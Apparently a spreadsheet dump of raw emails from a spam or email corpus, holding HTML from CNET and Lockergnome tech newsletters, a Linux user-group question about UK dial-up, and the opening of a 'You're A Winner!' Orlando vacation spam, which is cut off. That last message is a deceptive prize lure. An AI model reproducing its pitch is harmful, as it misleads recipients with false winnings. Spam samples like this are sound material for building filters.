 6.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzsUbSDIYmwzk0xBfd-8WrR" &gt;ActiveX Control Pad
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 6&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 7&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 4,030&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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7.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8VvmUmVceVXCHnpqL0wRR" &gt;UltraEdit-32&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 11&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,995&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8NOR8kerqm86ccJ_2d2ZR" &gt;Borland C++ Compiler&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 9&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 60&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,492&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiBYcRvZqzceCGFySNP8dR" &gt;Java 2 Development Kit&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 10&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,177&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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
 10.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYe-AT63oaDkjVsTLZ8iR" &gt;TextPad (32-bit)&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 12&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 84&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 2,056&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=95-XdTrrgdemetv9eIq14RmZWn304D_PRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_tVw_8rWLXZBXqONOVnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9LZaGc5w8PF_jEuwteR"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href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExoPG-K0h_4Mc3148lk6yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzwRjdLmhTRnU3P83P5XlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwkwdtBugeE4rbg6amtI4R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XW8Y4CAu0ssDLfzpHOCerR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2mMeIeNyGEI9rCM8vlR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmEt5xI2_7DQESNPe-i4R"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e416&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=53-n8CdnHnCBiH0XpcYx-pQ_Iwsz9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Fraud Wipes
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020711.html"&gt;
       http://www.lockergnome.com/issues/daily/20020711.html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&lt;/style&gt;&lt;title&gt;20020711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07.11.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET HIGH-SPEED ACCESS:&lt;/b&gt; Verizon Online DSL is an affordable, high-speed Internet connection. &lt;a href="http://www.qksrv.net/click-471546-2202776"&gt;Click here&lt;/a&gt; to see if Verizon Online DSL is available in your area. &lt;img src="http://www.qksrv.net/image-471546-2202776" width="1" height="1" border="0"&gt;    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I'm not a banker, and I'm not a credit expert - but these people
 speak from personal and professional experience. Draw your own
 conclusions. Lockergnomie Sang Vo writes: "Though you may have
 zero liability for a fraudulent transaction, the paperwork and red
 tape to work through if someone empties out all your funds can
 leave you hurting for a while. There are many credit cards that
 now offer zero liability for fraudulent transactions. So, contact
 your credit card provider / bank to see if you can have such a
 plan added to your card or if you can apply for one that does."
 And Russ Coover continues: "If you purchase something with a
 credit card, and you later decide to dispute the purchase (for a
 reason such as the product was faulty and the merchant refuses to
 replace it or, perhaps the product was never delivered), you can
 legally dispute the charge with your credit card company. However,
 if you use a debit card to make that purchase, you have no right
 to dispute the charge."
 &lt;p&gt;
 Jeff Morgan has a different interpretation of the regulation in
 question (E): "In 12 CFR II, Section 205.6, it's saying that if
 you give your financial institution timely notice of the theft of
 your card or PIN code (two business days), you are liable for no
 more than $50, otherwise you may be liable for up to $500." And
 Tim Miller extends the translation: "If someone puts a false
 charge on a credit card, the worse that will happen is your
 liability for $50, with the possibility that your next charge
 might not go through because the thief used all of your available
 balance.  If a false charge goes against your debit card and wipes
 out your bank balance, however, outstanding checks can bounce.
  Your bank may be able to get you all of your money back, but the
 payees of those bounced checks might sock you with $20-25
 insufficient fund fees - and they are under no obligation to waive
 those fees.  If you have  5 checks outstanding, you could be out
 over $100."
 &lt;p&gt;
 Frank Reyes was apparently lucky: "Someone recently obtained my
 debit card number through a local grocery store. I was told by the
 checker at the grocery store that the card readers would only
 accept Visa cards not ATM cards. I was very suspicious, and used
 my debit card instead. Apparently, the store's computer had been
 hacked, and my debit card number and name (among several
 others)were forwarded to an unscrupulous individual. I was
 reviewing my checking account online two days later, and noticed
 an unauthorized charge against my account ($60.00). I contacted
 the vendor that had charged my account and informed them of the
 fraudulent charge. The vendor stopped the shipment, provided the
 shipping address to my bank, and credited my account within 5 days
 after I informed them (The delay in the fund reversal was due to
 the 4th of July weekend). The only negative aspect is the fact
 that I had to request a new debit card, which has yet to arrive."
 &lt;p&gt;
 Further thoughts from Lockergnomie James Simbro: "I'm not totally
 sure on this, but I've been warned against using a debit card for
 online purchases.  Yes, you may not be liable for any of the
 false charges on a debit card (in the end), but in the meantime
 (during your dispute) the money will be withheld from your account
 and you will not have access to it. However with a credit card,
 you are not responsible for funds that are in dispute. The
 scenario I was given, was imagine if somebody falsely used your
 debit card and cleaned out your checking account?  The money is
 gone! False charges on a credit card are not "real money" until
 somebody has to pay them.  I would guess that each bank has
 different policies for debit card fraud. I might just have to call
 mine and see what I'd face." In short, be careful - no matter what
 you use or where you choose to use your plastic.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&lt;B&gt;CYG v20020115 [3.2M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.geocities.com/HoloGuides/CyG/"&gt;http://www.geocities.com/HoloGuides/CyG/&lt;/A&gt;
 &lt;P&gt;
 {Manage your collections} It seems like everyone collects
 something. In fact, just the other day I decided to start
 collecting dust. It's much easier than collecting stamps. If you
 do collect stamps, though, this organizer will help you keep track
 of them all. Or you can use it to keep track of your Star Wars
 trading card collection, or your coin collection, or your [insert
 collection here] collection. It works for everything, get it? It's
 also great for managing your MP3 lists, including ID3 tag editing.
 &amp;quot;CYG is founded on an object-oriented database approach, and
 carefully programmed with one goal in mind: universal usage.&amp;quot;
 &lt;p&gt;&lt;br&gt;
 &lt;B&gt;DriverManager v1.0 [557k] 2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.l5sg.com/DriverManager.html"&gt;http://www.l5sg.com/DriverManager.html&lt;/A&gt;
 &lt;P&gt;
 {Drive your drivers} Everyone else step outside while I have a
 talk with the power geeks. If you're running on NT, 2000, or XP
 and need to know what drivers you have running on your system,
 this program can show you. That's not too shabby, but of course,
 you can also change or even get rid of certain drivers if you
 desire. And that's, um, even more not too shabby. And that Refresh
 button is there to make sure you're seeing everything exactly how
 you want it. &amp;quot;DriverManager is a tool designed to allow System
 Administrators, Power Users and Driver Developers an easy means to
 view, modify or remove drivers and their information.&amp;quot;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&lt;B&gt;Transloader&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.transloader.com/"&gt;http://www.transloader.com/&lt;/A&gt;
 &lt;P&gt;
 &amp;quot;This site makes it easy to transfer files to your Web server.
 Mostly it is useful for sites like FlamingText.com and
 ImageBot.com to send generated images to another server (such as
 your Web or FTP server). This is particularly useful for WebTV
 users who can't save images on their own machine. Although we have
 no pre-set limits (okay, it's 2.4 GB), the transfers that you do
 through Transloader.com must be completed in five minutes. This
 server is capable of transferring over 1 Gig per minute; if you
 are talking to a slow server, your job may not complete in time.
 Other transloaders sometimes suffer from overloading (too many
 people using them), which is why I wrote this one. Hopefully, this
 will never happen to us, but in any case, check these others out,
 they have some nice services...&amp;quot;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size="1"&gt;&lt;B&gt;Full PDF Books&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001829.html"&gt;Poor Richard's Web&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001827.html"&gt;Internet Promotions&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001804.html"&gt;E-Mail Publishing&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001830.html"&gt;Web Site Makeover&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001803.html"&gt;Websites Made Easy&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001825.html"&gt;Online Communities&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001826.html"&gt;Home Networking&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001828.html"&gt;Internet Recruiting&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001824.html"&gt;Online Branding&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;B&gt;To Share or Not to Share&lt;/b&gt;
     &lt;br&gt;Scribbled by Lee Smith
 &lt;P&gt;
 I think that online file sharing is dependent on the file that is
 being shared. If the song is a current release or recent, then I
 do not believe in it. I can't consider it stealing because you
 can't steal from someone who willingly puts the file up for
 downloading. Those who did put the file online most likely feel
 that it is also not stealing, since they purchased the CD.
 However, I do not agree with RIAA or recording companies who are
 attempting to make their CDs &amp;quot;rip proof&amp;quot; either. I do not feel
 they have the right to dictate what songs I can listen to or when
 or in what order. I like to rip specific songs from CDs then make
 my own CD, which either goes down to my entertainment system or to
 my truck. The master CD is saved and rarely played (&amp;quot;why&amp;quot; is
 explained later in this message). I prefer making my own CDs for
 my truck because if my truck were to be broken into and my CDs
 stolen, it would be much easier to replace a self-burned CD than a
 master. Sometimes, masters cannot be replaced without a large
 expense, if at all.
 &lt;P&gt;
 If the song is outdated, an oldie (so to speak), and is not
 available anywhere, then yes, I do believe in it. Or, if the song
 being sought is wanted to rejuvenate one's collection, then yes, I
 do believe in that, too. Case in point: as a kid, I collected a
 lot of 45s and record albums. I have more than 4,000 records in my
 collection. Many were played so much that they are not playable
 anymore and, even though I did take care of them, due to the cheap
 stereos and record players in the 60s, they are 'shot.' I want to
 relive some of my younger days through music, but attempting to
 convert those records (to digital) is next to impossible for me.
 So, in this instance, no, I do not think it is illegal to seek out
 digitalized copies of the old songs that I already have records of
 (albums and/or 45s). If, however, the song(s) that I am seeking
 are available on CD, then I will be very quick to purchase that CD
 from Tower Records, The Warehouse, or any other reputable dealer.
 &lt;P&gt;
 For those that are impossible to find &amp;quot;digitals&amp;quot; for, then, one
 day, perhaps I will reach a point with technology (and money)
 where I can transfer those platters to WAV and they will sound as
 good as when they were originally recorded. I have been lucky
 enough to find some on CD thanks to the Internet; I was quick to
 purchase the disc, usually from the original artists themselves.
 Some of the music that I have, sadly, will never be heard again. I
 blame RIAA and the recording industry for that, too. Neither seem
 to care about the &amp;quot;lost&amp;quot; songs when digitally remastered CDs are
 released.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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;Pixel Decor&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.pixeldecor.com/"&gt;http://www.pixeldecor.com/&lt;/A&gt;
 &lt;P&gt;
 {Patterns for your screen} *yawn* Your desktop is more boring than
 I don't know what. Unfortunately, I, personally, can't help you
 out. Don't fret, though, cause Jen is here to provide you with
 some truly amazing desktop images, icons, and even calendars.
 She's got a very unique and creative style that you may enjoy. Oh,
 and did I mention she was a professional designer? That's right;
 now you know it's all good. The best part? All these images are
 FREE. The &amp;quot;Buzzz&amp;quot; tile is especially awesome (and this endorsement
 is even coming from the guy who hates creepy-crawlies of all
 kinds).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size="1"&gt;&lt;B&gt;Help Yourself&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000628.html"&gt;Microsoft Office Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000627.html"&gt;PC Productivity Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000626.html"&gt;Cool Internet Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000625.html"&gt;Windows 2000 Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000623.html"&gt;Windows XP Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001106.html"&gt;Top 50 Fun Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001104.html"&gt;Must-Know Terms&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001105.html"&gt;Top 50 Useful Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001099.html"&gt;Top 75 Tech Sites&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 Who can save you from making a small oversight with your digital
 video camera purchase? Lockergnomie Frank Kenna: &amp;quot;I see that
 you're thinking of getting a DV camera. I got one about a month
 ago, and I made one mistake: I didn't get one with A/V INPUTS.
 Mine has A/V outputs, which are great for getting your digital
 stuff out onto VHS, etc. But without the inputs, there's no way to
 get VHS or old 8mm footage into the camera. With inputs, not only
 can you get your old 8mm &amp;amp; VHS stuff onto DV tapes, but you can
 use the camera as a pass-through device and get the old stuff
 directly onto your computer for editing purposes. I wish someone
 had made clear the advantages and importance of inputs when I
 bought my DV camcorder. The reviews and magazines I read barely
 mentioned this feature - and nobody stressed its importance. But
 if you're going to be doing any editing, it is critical (if you
 want to work on any of your old stuff). Don't make the same
 mistake I did - make SURE you get this feature. It doesn't seem to
 impact the price of the cameras; some offer it and some don't.&amp;quot;
 This advice came not a moment too soon for me. Thank you for
 helping us, Frank!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href="http://www.lockergnome.com/issues/daily/20020711.html"&gt;http://www.lockergnome.com/issues/daily/20020711.html&lt;/a&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;MP3 SOFTWARE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=548557/"&gt;Havas MP3 Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=234527/"&gt;Magix MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=278075/"&gt;Ejay MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=468032/"&gt;Audiostation 5.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=588415/"&gt;Jack The MP3 Ripper&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=599956/"&gt;Pearson MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=472433/"&gt;Steinberg My MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=555517/"&gt;MusicMatch Jukebox 7.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=20635/"&gt;Hip Hop E-jay Record&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=393896/"&gt;MP3-Wolf&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=409500/"&gt;MP3 Maker Gold&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=273932/"&gt;The MP3 Wizard&lt;/A&gt;&lt;BR&gt;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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/lone.shoe.WMV"&gt;The Lone Shoe&lt;/a&gt;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Fraud Wipes  --&gt;
 I can't seem to find time to procrastinate...
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] freeserve in the uk?
</t>
  </si>
  <si>
    <t xml:space="preserve">ok, so if i was in the uk for a wekk, how might i configure my laptop to
 dial in to a freebie isp?  redhat's internet connection wizard actually
 has settings for uk isp's, but freeserve is the only one i recognize
 and it doen't seem to work.
 has anyone here done this?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</si>
  <si>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Congratualtions zzzz8969 ! !!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;div align="center"&gt;
   &lt;p align="left"&gt;&lt;font size="6" face="Times New Roman, Times, serif"&gt;&lt;b&gt;&lt;font color="#FF0033" face="Courier New, Courier, mono"&gt;You're 
     A Winner!&lt;/font&gt;&lt;font color="#0000FF" face="Courier New, Courier, mono"&gt; &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
     &lt;br&gt;
     &lt;font face="Courier New, Courier, mono" size="4"&gt;&lt;b&gt;Dear Traveler,&lt;/b&gt; &lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;&lt;b&gt;&lt;font color="#000099" size="5"&gt;Congratulations&lt;/font&gt;&lt;font color="#000099"&gt; 
   &lt;font size="3"&gt;you may be one of our&lt;/font&gt; LUCKY WINNERS!&lt;/font&gt;&lt;/b&gt; &lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Courier New, Courier, mono" size="4"&gt;You may be spending 
   your next vacation in beautiful &lt;b&gt;&lt;font color="#FF33CC"&gt;Orlando Florida&lt;/font&gt;&lt;/b&gt;!&lt;/font&gt;&lt;/p&gt;
 &lt;ul&gt;
   &lt;li&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#FF0033"&gt;&lt;b&gt;6 days 
     and 5 nights&lt;/b&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#000099"&gt; 
     of accommodations in sunny Orlando Florida &lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#FF0033"&gt;Round trip&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="4" color="#000099"&gt; 
